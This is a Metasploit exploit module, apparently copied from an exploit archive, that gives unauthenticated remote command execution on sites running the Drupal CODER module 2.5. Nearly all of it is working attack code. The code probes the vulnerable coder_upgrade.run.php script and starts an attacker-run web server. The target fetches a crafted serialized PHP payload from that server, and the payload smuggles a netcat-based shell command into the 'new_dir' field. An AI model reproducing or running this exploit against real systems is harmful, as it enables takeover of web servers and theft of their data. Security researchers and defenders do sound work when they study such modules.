Drupal CODER Module 2.5 - Remote Command Execution (Metasploit)

2016-07-25 21:05:06

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer

def initialize(info={})
super(update_info(info,
'Name' => 'Drupal CODER Module Remote Command Execution',
'Description' => %q{
This module exploits a Remote Command Execution vulnerability in
Drupal CODER Module. Unauthenticated users can execute arbitrary command
under the context of the web server user.

CODER module doesn't sufficiently validate user inputs in a script file
that has the php extension. A malicious unauthenticated user can make
requests directly to this file to execute arbitrary command.
The module does not need to be enabled for this to be exploited

This module was tested against CODER 2.5 with Drupal 7.5 installation on Ubuntu server.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Nicky Bloor', # discovery
'Mehmet Ince <[email protected]>' # msf module
],
'References' =>
[
['URL', 'https://www.drupal.org/node/2765575']
],
'Privileged' => false,
'Payload' =>
{
'Space' => 225,
'DisableNops' => true,
'BadChars' => "\x00\x2f",
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'netcat netcat-e'
},
},
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' => [ ['Automatic', {}] ],
'DisclosureDate' => 'Jul 13 2016',
'DefaultTarget' => 0
))

register_options(
[
OptString.new('TARGETURI', [true, 'The target URI of the Drupal installation', '/']),
OptAddress.new('SRVHOST', [true, 'Bogus web server host to receive request from target and deliver payload']),
OptPort.new('SRVPORT', [true, 'Bogus web server port to listen'])
]
)
end

def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),
)
if res && res.code == 200
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
end

def on_request_uri(cli, _request)
print_status("Incoming request detected...")
p = ''
p << 'a:6:{s:5:"paths";a:3:{s:12:"modules_base";s:8:"../../..";s:10:"files_base";s:5:"../..";s:14:"libraries_base";s:5:"../..";}'
p << 's:11:"theme_cache";s:16:"theme_cache_test";'
p << 's:9:"variables";s:14:"variables_test";'
p << 's:8:"upgrades";a:1:{i:0;a:2:{s:4:"path";s:2:"..";s:6:"module";s:3:"foo";}}'
p << 's:10:"extensions";a:1:{s:3:"php";s:3:"php";}'
p << 's:5:"items";a:1:{i:0;a:3:{s:7:"old_dir";s:12:"../../images";'
p << 's:7:"new_dir";s:'
p << (payload.encoded.length + 14).to_s
p << ':"f --help && '
p << payload.encoded
p << ' #";s:4:"name";s:4:"test";}}}'
print_status("Sending payload...")
send_response(cli, p)
end

def exploit
start_service
send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),
'encode_params' => false,
'vars_get' => {
'file' => get_uri
}
)
stop_service
end
end

Fixes

No fixes

In order to submit a new fix you need to be registered.